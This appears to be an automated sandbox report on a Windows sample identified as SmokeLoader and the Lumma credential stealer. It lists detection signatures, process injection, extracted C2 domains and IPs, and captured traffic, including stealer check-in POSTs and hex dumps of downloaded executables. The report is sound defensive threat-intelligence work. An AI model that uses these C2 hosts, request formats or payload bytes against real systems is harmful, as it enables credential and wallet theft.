Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:1318864
MD5:9e0025c871ae4e48587bdec5aa9e8778
SHA1:435035cf548dda47c159a553828c3dd23e5cda07
SHA256:bda02fb8758de2721d45b4e65c94bc281718b96f031f0c4e986972451f476977
Tags:exe
Infos:

Detection

LummaC Stealer, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected LummaC Stealer
Yara detected AntiVM3
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches for user specific document files
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6904 cmdline: C:\Users\user\Desktop\file.exe MD5: 9E0025C871AE4E48587BDEC5AA9E8778)
    • explorer.exe (PID: 3000 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 46A3.exe (PID: 4284 cmdline: C:\Users\user\AppData\Local\Temp\46A3.exe MD5: 4527E3FE757DD266980F572C43F22EF3)
        • RegAsm.exe (PID: 4268 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 8FE9545E9F72E460723F484C304314AD)
      • BB04.exe (PID: 6612 cmdline: C:\Users\user\AppData\Local\Temp\BB04.exe MD5: 59E6F40D24C3EA84FA3BCF55B8F72C9D)
        • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • AppLaunch.exe (PID: 7108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 4DF5F963C7E18F062E49870D0AFF8F6F)
        • WerFault.exe (PID: 5448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • wfshtit (PID: 3752 cmdline: C:\Users\user\AppData\Roaming\wfshtit MD5: 9E0025C871AE4E48587BDEC5AA9E8778)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["fiancejiveimp.fun", "fullppc.yz"], "Build Id": "rIwhoU--Elvin"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://gudintas.at/tmp/", "http://pik96.ru/tmp/", "http://rosatiauto.com/tmp/", "http://kingpirate.ru/tmp/"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\46A3.exeINDICATOR_EXE_Packed_DotNetReactorDetects executables packed with unregistered version of .NET ReactorditekSHen
  • 0x112b36:$s2: is protected by an unregistered version of .NET Reactor!" );</script>

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000003.886072573.0000000002400000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000007.00000003.940635525.0000000002400000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000007.00000002.951734565.0000000002516000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x5df3:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.file.exe.23f0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          7.3.wfshtit.2400000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            7.2.wfshtit.23f0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              7.2.wfshtit.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                0.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 4 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.3104.21.1.1849844802048094 10/03/23-18:02:47.032857
                  SID:2048094
                  Source Port:49844
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3172.67.137.12549832802048094 10/03/23-18:02:42.062053
                  SID:2048094
                  Source Port:49832
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:91.227.16.22192.168.2.380498282018572 10/03/23-18:02:37.535570
                  SID:2018572
                  Source Port:80
                  Destination Port:49828
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3104.21.1.1849840802048093 10/03/23-18:02:46.461905
                  SID:2048093
                  Source Port:49840
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3104.21.1.1849909802048094 10/03/23-18:03:17.025877
                  SID:2048094
                  Source Port:49909
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3172.67.137.12549830802048093 10/03/23-18:02:41.476601
                  SID:2048093
                  Source Port:49830
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3104.21.81.1749845802048094 10/03/23-18:02:47.044584
                  SID:2048094
                  Source Port:49845
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3172.67.151.21949846802048094 10/03/23-18:02:47.592349
                  SID:2048094
                  Source Port:49846
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://kingpirate.ru/tmp/URL Reputation: Label: malware
                  Source: http://pik96.ru/tmp/URL Reputation: Label: malware
                  Source: http://gudintas.at/tmp/URL Reputation: Label: malware
                  Source: http://malenursenect.fun/rLDbMMUlr2VHY/t/Avira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/dzAvira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/Sz#Avira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/apixJAvira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/vfAvira URL Cloud: Label: malware
                  Source: http://malenursenect.funAvira URL Cloud: Label: malware
                  Source: http://h170811.srv22.test-hf.su/186.exeAvira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/apiAvira URL Cloud: Label: malware
                  Source: https://kingpirate.ru/tmp/Avira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/apip7Avira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/5uAvira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/tAvira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/Avira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/api)Avira URL Cloud: Label: malware
                  Source: http://malenursenect.fun/apilljAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\wfshtitAvira: detection malicious, Label: HEUR/AGEN.1312455
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeAvira: detection malicious, Label: TR/AD.Nekark.yeqin
                  Found malware configuration
                  Source: 00000007.00000002.951699501.0000000002400000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://gudintas.at/tmp/", "http://pik96.ru/tmp/", "http://rosatiauto.com/tmp/", "http://kingpirate.ru/tmp/"]}
                  Source: 11.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["fiancejiveimp.fun", "fullppc.yz"], "Build Id": "rIwhoU--Elvin"}
                  Multi AV Scanner detection for submitted file
                  Source: file.exeReversingLabs: Detection: 34%
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Roaming\wfshtitReversingLabs: Detection: 34%
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\wfshtitJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07DE00 CryptGenRandom,__CxxThrowException@8,10_2_6F07DE00
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07DEE0 CryptReleaseContext,10_2_6F07DEE0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07DD20 CryptReleaseContext,10_2_6F07DD20
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07DBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,10_2_6F07DBB0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07D9D0 CryptAcquireContextA,GetLastError,10_2_6F07D9D0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07D7D4 CryptReleaseContext,10_2_6F07D7D4
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F07D7F0 CryptReleaseContext,10_2_6F07D7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004385E8 _strlen,CryptStringToBinaryA,CryptStringToBinaryA,11_2_004385E8
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 172.67.171.76:443 -> 192.168.2.3:49934 version: TLS 1.2
                  Source: Binary string: C:\Users\Test\Desktop\LC2\LC2_servConf\Release\LC2.pdb source: 46A3.exe, 0000000A.00000002.984001831.00000000029BE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.899040117.00007FFA11431000.00000020.00000001.01000000.00000005.sdmp
                  Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.899040117.00007FFA11431000.00000020.00000001.01000000.00000005.sdmp
                  Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 46A3.exe, 0000000A.00000002.984079448.0000000003F6A000.00000004.00000800.00020000.00000000.sdmp, 46A3.exe, 0000000A.00000002.984950384.0000000005240000.00000004.08000000.00040000.00000000.sdmp, 46A3.exe, 0000000A.00000002.984079448.0000000003901000.00000004.00000800.00020000.00000000.sdmp, 46A3.exe, 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmp, Protect544cd51a.dll.10.dr
                  Source: Binary string: communication_program_compendium.pdb source: 46A3.exe, 0000000A.00000000.981708915.0000000000332000.00000002.00000001.01000000.00000007.sdmp, 46A3.exe.1.dr
                  Source: Binary string: eex.pdb source: explorer.exe, 00000001.00000000.899040117.00007FFA11431000.00000020.00000001.01000000.00000005.sdmp
                  Source: Binary string: C:\Users\Test\Desktop\LC2\LC2_servConf\Release\LC2.pdbu source: 46A3.exe, 0000000A.00000002.984001831.00000000029BE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 46A3.exe, 0000000A.00000002.984950384.00000000052FA000.00000004.08000000.00040000.00000000.sdmp, 46A3.exe, 0000000A.00000002.984079448.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 46A3.exe, 0000000A.00000002.984079448.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00456688 FindFirstFileExW,11_2_00456688
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045673C FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_0045673C
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h10_2_0113C8B0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_011353D4
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h10_2_0113B4CC
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h10_2_0113C9B9
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h10_2_0113C9C0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h10_2_0113C8A8
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h10_2_0113CBD9
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h10_2_0113CBE0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h10_2_0113CAD0
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 40000003h10_2_0113CAC8

                  Networking

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeDomain query: gudintas.at
                  Source: C:\Windows\explorer.exeDomain query: pik96.ru
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.59.14.90 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 172.67.171.76 443Jump to behavior
                  Source: C:\Windows\explorer.exeDomain query: h170811.srv22.test-hf.su
                  Source: C:\Windows\explorer.exeNetwork Connect: 175.126.109.15 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 189.232.58.103 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 193.149.185.139 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.40.39.251 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.171.233.129 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.104.254.139 80Jump to behavior
                  Source: C:\Windows\explorer.exeDomain query: kingpirate.ru
                  Source: C:\Windows\explorer.exeNetwork Connect: 186.13.17.220 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 91.227.16.22 80Jump to behavior
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2018572 ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) 91.227.16.22:80 -> 192.168.2.3:49828
                  Source: TrafficSnort IDS: 2048093 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In 192.168.2.3:49830 -> 172.67.137.125:80
                  Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49832 -> 172.67.137.125:80
                  Source: TrafficSnort IDS: 2048093 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In 192.168.2.3:49840 -> 104.21.1.18:80
                  Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49844 -> 104.21.1.18:80
                  Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49845 -> 104.21.81.17:80
                  Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49846 -> 172.67.151.219:80
                  Source: TrafficSnort IDS: 2048094 ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration 192.168.2.3:49909 -> 104.21.1.18:80
                  Performs DNS queries to domains with low reputation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDNS query: fullppc.xyz
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: fiancejiveimp.fun
                  Source: Malware configuration extractorURLs: fullppc.yz
                  Source: Malware configuration extractorURLs: http://gudintas.at/tmp/
                  Source: Malware configuration extractorURLs: http://pik96.ru/tmp/
                  Source: Malware configuration extractorURLs: http://rosatiauto.com/tmp/
                  Source: Malware configuration extractorURLs: http://kingpirate.ru/tmp/
                  Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: fiancejiveimp.funContent-Length: 54Cache-Control: no-cacheData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 72 49 77 68 6f 55 2d 2d 45 6c 76 69 6e 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=rIwhoU--Elvin&j=default&ver=4.0
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: malenursenect.funContent-Length: 61Cache-Control: no-cacheData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 50 72 54 69 4f 37 2d 2d 49 6e 73 74 61 6c 6c 42 65 73 74 32 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=PrTiO7--InstallBest2&j=default&ver=4.0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Tue, 03 Oct 2023 16:02:37 GMTContent-Type: application/octet-streamContent-Length: 3413536Connection: keep-aliveKeep-Alive: timeout=20Last-Modified: Tue, 03 Oct 2023 15:46:04 GMTETag: "341620-606d1c9d351f5"Accept-Ranges: bytesX-Power-Supply-By: 220 VoltData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 d4 ac cf 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 c4 31 00 00 c2 01 00 00 00 00 00 1e e3 31 00 00 20 00 00 00 00 32 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 33 00 00 02 00 00 a6 70 34 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 d0 e2 31 00 4b 00 00 00 00 00 32 00 18 bf 01 00 00 00 00 00 00 00 00 00 00 88 33 00 20 8e 00 00 00 c0 33 00 0c 00 00 00 6b e2 31 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 c3 31 00 00 20 00 00 00 c4 31 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 bf 01 00 00 00 32 00 00 c0 01 00 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 33 00 00 02 00 00 00 86 33 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 31 00 00 00 00 00 48 00 00 00 02 00 05 00 68 44 04 00 00 90 0d 00 03 00 00 00 81 00 00 06 68 d4 11 00 1b 0c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3a 2b 05 28 c5 cc 35 45 02 28 13 00 00 0a 2a 00 56 2b 05 28 bc 2c 0e 3f 00 02 28 14 00 00 0a 38 00 00 00 00 00 2a 00 00 42 2b 05 28 bf 1c 4a 3a 7e 01 00 00 04 14 fe 01 2a 00 00 00 36 2b 05 28 66 a6 36 61 7e 01 00 00 04 2a 00 00 13 30 03 00 a4 00 00 00 01 00 00 11 2b 05 28 2a ee 4d 65 38 1e 00 00 00 fe 0c 00 00 45 04 00 00 00 2f 00 00 00 4b 00 00 00 6b 00 00 00 4a 00 00 00 38 2a 00 00 00 73 15 00 00 0a 80 02 00 00 04 38 00 00 00 00 73 16 00 00 0a 80 03 00 00 04 20 01 00 00 00 16 39 c2 ff ff ff 26 38 b8 ff ff ff 73 17 00 00 0a 80 05 00 00 04 20 02 00 00 00 17 3a a7 ff ff ff 26 38 9d ff ff ff 2a 73 18 00 00 0a 80 04 00 00 04 20 00 00 00 00 17 3a 8b ff ff ff 26 20 00 00 00 00 38 80 ff ff ff 73 19 00 00 0a 80 06 00 00 04 20 03 00 00 00 38 6c ff ff ff 13 30 03 00 5a 00 00 00 02 00 00 11 2b 05 28 da 57 30 5c 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 27 00 00 00 05 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Oct 2023 16:02:43 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 03 Oct 2023 07:15:06 GMTETag: "98800-606caa6821478"Accept-Ranges: bytesContent-Length: 624640Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 6a 10 68 79 0b 7e 3b 79 0b 7e 3b 79 0b 7e 3b aa 79 7d 3a 72 0b 7e 3b aa 79 7b 3a e9 0b 7e 3b aa 79 7a 3a 6d 0b 7e 3b 36 77 7a 3a 68 0b 7e 3b aa 79 7f 3a 70 0b 7e 3b 79 0b 7f 3b f4 0b 7e 3b 36 77 7b 3a 47 0b 7e 3b 36 77 7d 3a 6f 0b 7e 3b b8 77 7b 3a 78 0b 7e 3b b8 77 7e 3a 78 0b 7e 3b b8 77 81 3b 78 0b 7e 3b b8 77 7c 3a 78 0b 7e 3b 52 69 63 68 79 0b 7e 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cc be 1b 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 22 00 78 01 00 00 18 08 00 00 00 00 00 88 62 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 09 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 1c 02 00 50 00 00 00 c0 1c 02 00 64 00 00 00 00 a0 09 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 68 19 00 00 b0 fb 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 01 00 18 00 00 00 f0 fa 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 76 01 00 00 10 00 00 00 78 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 96 00 00 00 90 01 00 00 96 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 65 07 00 00 30 02 00 00 5a 07 00 00 12 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 09 00 00 02 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 19 00 00 00 b0 09 00 00 1a 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 